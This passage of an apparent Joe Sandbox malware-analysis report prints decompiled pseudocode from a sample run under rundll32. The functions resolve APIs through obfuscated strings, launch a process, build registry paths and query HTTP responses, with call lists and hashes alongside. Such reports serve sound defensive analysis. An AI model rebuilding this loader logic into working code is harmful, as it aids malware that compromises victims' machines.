					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4a4d2a8; // 0x40a5a8
					_t18 = _t47 + 0x4a4e3e6; // 0x73797325
					_t68 = E04A47912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4a4d2a8; // 0x40a5a8
						_t19 = _t50 + 0x4a4e747; // 0x4e58cef
						_t20 = _t50 + 0x4a4e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04A43179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04A43179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4a4d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04A48B22(_t70);
				goto L12;
			}


















                                0x04a4348d
                                0x04a4348d
                                0x04a4349c
                                0x04a434a3
                                0x04a434a8
                                0x04a435b5
                                0x04a435bc
                                0x04a435bc
                                0x04a434b7
                                0x04a434bf
                                0x04a434c2
                                0x04a434c7
                                0x04a434dc
                                0x04a434e2
                                0x04a434e3
                                0x04a434e6
                                0x04a434ec
                                0x04a434ef
                                0x04a434f4
                                0x04a434fc
                                0x04a43508
                                0x04a4350c
                                0x04a4359c
                                0x04a43512
                                0x04a43512
                                0x04a43517
                                0x04a4351e
                                0x04a43532
                                0x04a43536
                                0x04a43585
                                0x04a43538
                                0x04a43539
                                0x04a43540
                                0x04a43559
                                0x04a4355b
                                0x04a4355f
                                0x04a43566
                                0x04a43580
                                0x04a43568
                                0x04a43571
                                0x04a43576
                                0x04a43576
                                0x04a43566
                                0x04a43594
                                0x04a43594
                                0x04a4350c
                                0x04a435a3
                                0x04a435ac
                                0x04a435b0
                                0x00000000

                                APIs
                                  • Part of subcall function 04A44944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A434A1,?,00000001,?,?,00000000,00000000), ref: 04A44969
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A4498B
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A449A1
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A449B7
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A449CD
                                  • Part of subcall function 04A44944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A449E3
                                • memset.NTDLL ref: 04A434EF
                                  • Part of subcall function 04A47912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04A43508,73797325), ref: 04A47923
                                  • Part of subcall function 04A47912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04A4793D
                                • GetModuleHandleA.KERNEL32(4E52454B,04E58CEF,73797325), ref: 04A43525
                                • GetProcAddress.KERNEL32(00000000), ref: 04A4352C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04A43594
                                  • Part of subcall function 04A43179: GetProcAddress.KERNEL32(36776F57,04A48BDC), ref: 04A43194
                                • CloseHandle.KERNEL32(00000000,00000001), ref: 04A43571
                                • CloseHandle.KERNEL32(?), ref: 04A43576
                                • GetLastError.KERNEL32(00000001), ref: 04A4357A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                • String ID: Ut
                                • API String ID: 3075724336-8415677
                                • Opcode ID: 3a418f365c7bc776c03a93a9c9be3752936bc212887471d47805e9d3555103c3
                                • Instruction ID: ae08512aa68381fc2b7925674ba55b915a7375660bb80c23bbebd817435a579a
                                • Opcode Fuzzy Hash: 3a418f365c7bc776c03a93a9c9be3752936bc212887471d47805e9d3555103c3
                                • Instruction Fuzzy Hash: 773150B6900208AFEF10AFA4D988D9EBBBCEFC8314F004569E906E7110D775AE49DB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A48F85, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E04A48F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x4a4d33c; // 0x4e59bc0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04A49B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x4a4c18c;
				}
				_t46 = E04A47F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04A41525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x4a4d2a8; // 0x40a5a8
						_t16 = _t75 + 0x4a4eb08; // 0x530025
						 *0x4a4d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04A49B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x4a4c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04A41525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04A48B22(_v20);
						} else {
							_t66 =  *0x4a4d2a8; // 0x40a5a8
							_t31 = _t66 + 0x4a4ec28; // 0x73006d
							 *0x4a4d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04A48B22(_v12);
				}
				return _v24;
			}




























                                0x04a48f8d
                                0x04a48f93
                                0x04a48f9a
                                0x04a48fa0
                                0x04a48fa4
                                0x04a48fa8
                                0x04a48fab
                                0x04a48fb0
                                0x04a48fb5
                                0x04a48fb7
                                0x04a48fb7
                                0x04a48fc0
                                0x04a48fc5
                                0x04a48fca
                                0x04a48fd0
                                0x04a48fda
                                0x04a48fe3
                                0x04a48fea
                                0x04a49003
                                0x04a49008
                                0x04a4900d
                                0x04a49016
                                0x04a4901f
                                0x04a49030
                                0x04a49039
                                0x04a4903d
                                0x04a49041
                                0x04a49046
                                0x04a4904b
                                0x04a4904d
                                0x04a4904d
                                0x04a49057
                                0x04a49060
                                0x04a49067
                                0x04a4907f
                                0x04a49083
                                0x04a490c0
                                0x04a49085
                                0x04a49088
                                0x04a49090
                                0x04a490a1
                                0x04a490ad
                                0x04a490b5
                                0x04a490b9
                                0x04a490b9
                                0x04a49083
                                0x04a490c8
                                0x04a490cd
                                0x04a490d4

                                APIs
                                • GetTickCount.KERNEL32 ref: 04A48F9A
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 04A48FDA
                                • lstrlen.KERNEL32(00000000), ref: 04A48FE3
                                • lstrlen.KERNEL32(00000000), ref: 04A48FEA
                                • lstrlenW.KERNEL32(80000002), ref: 04A48FF7
                                • lstrlen.KERNEL32(?,00000004), ref: 04A49057
                                • lstrlen.KERNEL32(?), ref: 04A49060
                                • lstrlen.KERNEL32(?), ref: 04A49067
                                • lstrlenW.KERNEL32(?), ref: 04A4906E
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: e210c9373d6e5af231fde9bb86a0cab66a7a32232b663ed8117d1b504670107b
                                • Instruction ID: 5331b94083c7922d1c761871780b00948e1cb6912485f0d066c881cc5af0a358
                                • Opcode Fuzzy Hash: e210c9373d6e5af231fde9bb86a0cab66a7a32232b663ed8117d1b504670107b
                                • Instruction Fuzzy Hash: 6A414A76900219FFDF11AFA4DD489DEBBB9EFC8354F054054E904A7210DB3AEA61DB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A457DD, Relevance: 10.6, APIs: 7, Instructions: 92networksynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A457DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04A41525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E04A48B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04A429C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














                                0x04a457dd
                                0x04a457dd
                                0x04a457ed
                                0x04a457f0
                                0x04a457f4
                                0x04a457fa
                                0x04a457ff
                                0x04a45818
                                0x04a4582c
                                0x04a45833
                                0x04a4583a
                                0x04a4588d
                                0x04a45893
                                0x04a45899
                                0x04a458d4
                                0x04a458da
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a45899
                                0x04a45840
                                0x00000000
                                0x04a45847
                                0x04a45855
                                0x04a45858
                                0x04a4585b
                                0x04a45867
                                0x04a4586b
                                0x04a458cd
                                0x04a4586d
                                0x04a4587f
                                0x04a458bd
                                0x04a458c8
                                0x04a45881
                                0x04a45884
                                0x04a45888
                                0x04a45888
                                0x04a4587f
                                0x00000000
                                0x04a4586b
                                0x04a45840
                                0x04a45804
                                0x04a4580a
                                0x04a4580d
                                0x04a45812
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a458a2
                                0x04a458aa
                                0x04a458af
                                0x04a458b2
                                0x00000000

                                APIs
                                • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04A457F4
                                • SetEvent.KERNEL32(?), ref: 04A45804
                                • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04A45836
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A4585B
                                • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 04A4587B
                                • GetLastError.KERNEL32 ref: 04A4588D
                                  • Part of subcall function 04A429C0: WaitForMultipleObjects.KERNEL32(00000002,04A4A923,00000000,04A4A923,?,?,?,04A4A923,0000EA60), ref: 04A429DB
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • GetLastError.KERNEL32(00000000), ref: 04A458C2
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                • String ID:
                                • API String ID: 3369646462-0
                                • Opcode ID: ccc5fe487e68f0f8cc8b2eabed211ae6050e3de67c826cb8fb3d14f770b56325
                                • Instruction ID: 67f12f899016caca4930a221e6724cd55198002e3977d85793eb574fa6acc7fb
                                • Opcode Fuzzy Hash: ccc5fe487e68f0f8cc8b2eabed211ae6050e3de67c826cb8fb3d14f770b56325
                                • Instruction Fuzzy Hash: 773123B5D00309FFEB20DFA5C88499EB7F8FBC8314F104969E602A6151DB75AA49AF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A47B8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 63%
                                			E04A47B8D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4a4d2a8; // 0x40a5a8
				_t1 = _t9 + 0x4a4e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04A4A055(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04A41525(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04A41188(_t34, _t41, _a8);
						E04A48B22(_t41);
						_t42 = E04A4976F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04A48B22(_t36);
							_t36 = _t42;
						}
						_t43 = E04A4A41C(_t36, _t33);
						if(_t43 != 0) {
							E04A48B22(_t36);
							_t36 = _t43;
						}
					}
					E04A48B22(_t28);
				}
				return _t36;
			}














                                0x04a47b8d
                                0x04a47b90
                                0x04a47b91
                                0x04a47b99
                                0x04a47ba0
                                0x04a47ba7
                                0x04a47bab
                                0x04a47bb1
                                0x04a47bb8
                                0x04a47bbd
                                0x04a47bcf
                                0x04a47bd3
                                0x04a47bd7
                                0x04a47bdd
                                0x04a47be2
                                0x04a47bf2
                                0x04a47bf4
                                0x04a47c0b
                                0x04a47c0f
                                0x04a47c12
                                0x04a47c17
                                0x04a47c17
                                0x04a47c20
                                0x04a47c24
                                0x04a47c27
                                0x04a47c2c
                                0x04a47c2c
                                0x04a47c24
                                0x04a47c2f
                                0x04a47c2f
                                0x04a47c3a

                                APIs
                                  • Part of subcall function 04A4A055: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,04A47BA7,253D7325,00000000,00000000,7691C740,?,?,04A49DA0,?), ref: 04A4A0BC
                                  • Part of subcall function 04A4A055: sprintf.NTDLL ref: 04A4A0DD
                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,04A49DA0,?,04E595B0), ref: 04A47BB8
                                • lstrlen.KERNEL32(?,?,?,04A49DA0,?,04E595B0), ref: 04A47BC0
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • strcpy.NTDLL ref: 04A47BD7
                                • lstrcat.KERNEL32(00000000,?), ref: 04A47BE2
                                  • Part of subcall function 04A41188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04A47BF1,00000000,?,?,?,04A49DA0,?,04E595B0), ref: 04A4119F
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04A49DA0,?,04E595B0), ref: 04A47BFF
                                  • Part of subcall function 04A4976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04A47C0B,00000000,?,?,04A49DA0,?,04E595B0), ref: 04A49779
                                  • Part of subcall function 04A4976F: _snprintf.NTDLL ref: 04A497D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 391a21a89a9d2d40a65c225028c730b7da13c464086d4e2f139f0224edd11907
                                • Instruction ID: 1584da194bb64263b7e51c2041ed7dd5856c10f33fd875be2015af32cdd85d8f
                                • Opcode Fuzzy Hash: 391a21a89a9d2d40a65c225028c730b7da13c464086d4e2f139f0224edd11907
                                • Instruction Fuzzy Hash: 2911C67B9011257B67227BB4AE48CAF76ADDFD86683050515F504EB100DF39ED0247A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 04A494A4
                                • SysAllocString.OLEAUT32(0070006F), ref: 04A494B8
                                • SysAllocString.OLEAUT32(00000000), ref: 04A494CA
                                • SysFreeString.OLEAUT32(00000000), ref: 04A49532
                                • SysFreeString.OLEAUT32(00000000), ref: 04A49541
                                • SysFreeString.OLEAUT32(00000000), ref: 04A4954C
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 7f9832f21c14ec078a4065e8904b86dfef179e63f3f5ef82119965bf81df9477
                                • Instruction ID: 9dd6a65e1ca7d62516a84c1ea3d2332960eae64512db291eaf90071225ed1346
                                • Opcode Fuzzy Hash: 7f9832f21c14ec078a4065e8904b86dfef179e63f3f5ef82119965bf81df9477
                                • Instruction Fuzzy Hash: 11415175900609AFDB01DFBCD84469FBBB9EFC9310F144465E914EB210DA71ED16CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A44944, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A44944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04A41525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4a4d2a8; // 0x40a5a8
					_t1 = _t23 + 0x4a4e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4a4d2a8; // 0x40a5a8
					_t2 = _t26 + 0x4a4e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04A48B22(_t54);
					} else {
						_t30 =  *0x4a4d2a8; // 0x40a5a8
						_t5 = _t30 + 0x4a4e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4a4d2a8; // 0x40a5a8
							_t7 = _t33 + 0x4a4e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4a4d2a8; // 0x40a5a8
								_t9 = _t36 + 0x4a4e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4a4d2a8; // 0x40a5a8
									_t11 = _t39 + 0x4a4e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04A45CD1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x04a44953
                                0x04a44957
                                0x04a44a19
                                0x04a4495d
                                0x04a4495d
                                0x04a44962
                                0x04a44975
                                0x04a44977
                                0x04a4497c
                                0x04a44984
                                0x04a4498b
                                0x04a4498d
                                0x04a44992
                                0x04a44a11
                                0x04a44a12
                                0x04a44994
                                0x04a44994
                                0x04a44999
                                0x04a449a1
                                0x04a449a3
                                0x04a449a8
                                0x00000000
                                0x04a449aa
                                0x04a449aa
                                0x04a449af
                                0x04a449b7
                                0x04a449b9
                                0x04a449be
                                0x00000000
                                0x04a449c0
                                0x04a449c0
                                0x04a449c5
                                0x04a449cd
                                0x04a449cf
                                0x04a449d4
                                0x00000000
                                0x04a449d6
                                0x04a449d6
                                0x04a449db
                                0x04a449e3
                                0x04a449e5
                                0x04a449ea
                                0x00000000
                                0x04a449ec
                                0x04a449f2
                                0x04a449f7
                                0x04a449fe
                                0x04a44a03
                                0x04a44a08
                                0x00000000
                                0x04a44a0a
                                0x04a44a0d
                                0x04a44a0d
                                0x04a44a08
                                0x04a449ea
                                0x04a449d4
                                0x04a449be
                                0x04a449a8
                                0x04a44992
                                0x04a44a27

                                APIs
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04A434A1,?,00000001,?,?,00000000,00000000), ref: 04A44969
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04A4498B
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04A449A1
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04A449B7
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04A449CD
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04A449E3
                                  • Part of subcall function 04A45CD1: memset.NTDLL ref: 04A45D50
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: b754cc5ec1b89e954d9abf9f21d3ea3b72f48a857f51377698bca2253faf563b
                                • Instruction ID: d5e4ef0eac354432179553d5317e0189ea99dfc19dc255e79ac721fa39be0f7b
                                • Opcode Fuzzy Hash: b754cc5ec1b89e954d9abf9f21d3ea3b72f48a857f51377698bca2253faf563b
                                • Instruction Fuzzy Hash: 722157B560060AAFE710EF69DC88E5FB7ECEFD83047014426E905DB661E774ED058B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A44B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 88%
                                			E04A44B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x4a4d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04A47B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04A48C52(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E04A48B22(_a8);
						goto L29;
					}
					_t64 =  *0x4a4d278; // 0x4e59d18
					_t16 = _t64 + 0xc; // 0x4e59e3a
					_t65 = E04A47B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d04a4c0
						if(E04A4A38F(_t97,  *_t33, _t91, _a8,  *0x4a4d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x4a4d2a8; // 0x40a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x4a4ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x4a4e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04A48F85(_t69,  *0x4a4d334,  *0x4a4d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x4a4d2a8; // 0x40a5a8
									_t44 = _t71 + 0x4a4e846; // 0x74666f53
									_t73 = E04A47B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d04a4c0
